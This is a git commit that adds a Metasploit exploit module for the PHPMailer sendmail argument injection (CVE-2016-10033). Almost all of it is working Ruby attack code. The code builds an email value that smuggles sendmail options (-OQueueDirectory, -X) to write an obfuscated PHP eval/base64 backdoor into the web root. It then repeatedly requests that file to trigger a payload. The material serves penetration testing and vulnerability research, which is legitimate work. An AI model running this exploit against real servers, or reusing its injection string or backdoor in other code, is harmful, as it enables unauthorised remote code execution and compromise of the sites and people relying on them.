Add the PHPMailer Argument Injection exploit

zeroSteiner · zeroSteiner · commit c9dd7a50b683 · 2016-12-29T17:17:06.000-05:00
diff --git a/modules/exploits/multi/http/phpmailer_arg_injection.rb b/modules/exploits/multi/http/phpmailer_arg_injection.rb
@@ -0,0 +1,120 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'PHPMailer Sendmail Argument Injection',
+      'Description'    => %q{
+        PHPMailer versions up to and including 5.2.20 are affected by a
+        vulnerability which can be leveraged by an attacker to write a file with
+        partially controlled contents to an arbitrary location through injection
+        of arguments that are passed to the sendmail binary. This module
+        writes a payload to the web root of the webserver before then executing
+        it with an HTTP request. The user running PHPMailer must have write
+        access to the specified WEB_ROOT directory and successful exploitation
+        can take a few minutes.
+      },
+      'Author'         => [
+        'Dawid Golunski',   # vulnerability discovery and original PoC
+        'Spencer McIntyre'  # metasploit module
+      ],
+      'License'        => MSF_LICENSE,
+      'References'     => [
+        ['CVE', '2016-10033'],
+        ['EDB', '40969'],
+        ['URL', 'https://github.com/opsxcq/exploit-CVE-2016-10033'],
+        ['URL', 'https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html']
+      ],
+      'DisclosureDate' => 'Dec 26 2016',
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Payload'        => {'DisableNops' => true},
+      'Targets'        => [['Automatic', {}]],
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptEnum.new('VERSION', [true, 'The version of PHPMailer', '<=5.2.18', ['<=5.2.18', '5.2.20']]),
+        OptString.new('TARGETURI', [true, 'Path to the application root', '/']),
+        OptString.new('WEB_ROOT', [true, 'Path to the web root', '/var/www'])
+      ], self.class)
+    register_advanced_options(
+      [
+        OptInt.new('WAIT_TIMEOUT', [true, 'Seconds to wait to trigger the payload', 300])
+      ], self.class)
+  end
+
+  def trigger(trigger_uri)
+    print_status('Sleeping before requesting the written file')
+
+    page_found = false
+    sleep_time = 10
+    wait_time = datastore['WAIT_TIMEOUT']
+    print_status("Waiting for up to #{wait_time} seconds to trigger the payload")
+    while wait_time > 0
+      sleep(sleep_time)
+      wait_time -= sleep_time
+      res = send_request_cgi(
+        'method'   => 'GET',
+        'uri'      => trigger_uri
+      )
+
+      if res.nil?
+        if page_found or session_created?
+          print_good('Successfully triggered the payload')
+          break
+        end
+
+        next
+      end
+
+      next unless res.code == 200
+
+      if res.body.length == 0 and not page_found
+        print_good('Successfully found the payload')
+        page_found = true
+      end
+    end
+  end
+
+  def exploit
+    payload_file_name = "#{rand_text_alphanumeric(8)}.php"
+    payload_file_path = "#{datastore['WEB_ROOT']}/#{payload_file_name}"
+
+    if datastore['VERSION'] == '<=5.2.18'
+      email = "\"#{rand_text_alphanumeric(4 + rand(8))}\\\" -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
+    elsif datastore['VERSION'] == '5.2.20'
+      email = "\\\"#{rand_text_alphanumeric(4 + rand(8))}\\' -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\\\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
+    else
+      fail_with(Failure::NoTarget, 'The specified version is not supported')
+    end
+
+    data = Rex::MIME::Message.new
+    data.add_part('submit', nil, nil, 'form-data; name="action"')
+    data.add_part("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", nil, nil, 'form-data; name="name"')
+    data.add_part(email, nil, nil, 'form-data; name="email"')
+    data.add_part("#{rand_text_alphanumeric(2 + rand(20))}", nil, nil, 'form-data; name="message"')
+
+    print_status("Writing the backdoor to #{payload_file_path}")
+    res = send_request_cgi(
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri),
+      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
+      'data'     => data.to_s
+    )
+
+    register_files_for_cleanup(payload_file_path)
+    trigger(normalize_uri(target_uri, payload_file_name))
+  end
+end
